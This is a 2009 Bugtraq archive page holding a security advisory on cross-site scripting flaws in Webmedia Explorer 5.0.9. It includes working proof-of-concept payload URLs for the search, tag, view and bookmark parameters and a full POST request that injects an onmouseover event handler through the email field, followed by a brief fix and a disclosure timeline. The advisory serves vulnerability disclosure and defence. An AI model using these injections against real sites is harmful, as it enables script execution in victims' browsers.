Home page logo
/

bugtraq logo Bugtraq mailing list archives

[InterN0T] Webmedia Explorer - XSS Vulnerability
From: security () intern0t net
Date: Fri, 12 Jun 2009 13:14:50 -0600

Webmedia Explorer - Cross Site Scripting Vulnerability

Version Affected: 5.0.9 (newest is: 5.10.0)

Info: Webmedia Explorer is the alternative CMS engine that reads the hard disc and generates a website realtime taking 
advantage of a very powerful rendering and data fetching caching system.

Credits: InterN0T

External Links:
http://www.webmediaexplorer.com/


-:: The Advisory ::-

Vulnerable Function / ID Calls:
search, tag, bookmark & "another function that registers all extra calls"

Cross Site Scripting: (by using event handlers)
http://[HOST]/webmediaexpl/htdocs/index.php?search="; onmouseover=alert(0) ---
-- Will be executed when a user moves his mouse over the search field.

http://[HOST]/webmediaexpl/htdocs/?tag="; onmouseover=alert(0) ---
-- Will be executed when a user moves his mouse over a tag.

http://[HOST]/webmediaexpl/htdocs/?view=2&thisisnotarealcall=')" onmouseover=alert(0) > ---
-- Will be executed when a user moves his mouse over the column field. (unlikely)

http://[HOST]/webmediaexpl/htdocs/index.php?dir=&bookmark="; onmouseover=alert(0) > ---&action=edit
-- Requires admin access, however since this is a hidden tag exploitation is highly unlikely.

POST Method - Cross Site Scripting:
Host: [HOST]
User-Agent: FireFox-3-RoXx
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer:
http://[HOST]/webmediaexpl/htdocs/index.php?action=remember
Content-Type: application/x-www-form-urlencoded
Content-Length: 58

Post Content:
email=%22+onmouseover%3Dalert%280%29+%3E+---&captcha_code=

(the following was sent:  " onmouseover=alert(0) > --- )

-:: Solution ::-
Filtering event handlers should do the trick.

Conclusion:
A pretty secure system over all, nice to see.

Reference:
http://forum.intern0t.net/intern0t-advisories/1123-intern0t-webmedia-explorer-cross-site-scripting-vulnerability.html

Disclosure Information:
- Vulnerabilities found, researched and confirmed between 5th to 10th June.
- Advisory finished and published on InterN0T the 12th June.
- Vendor and Buqtraq (SecurityFocus) contacted the 12th June.


All of the best,
MaXe


  By Date           By Thread  

Current thread:
  • [InterN0T] Webmedia Explorer - XSS Vulnerability security (Jun 15)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]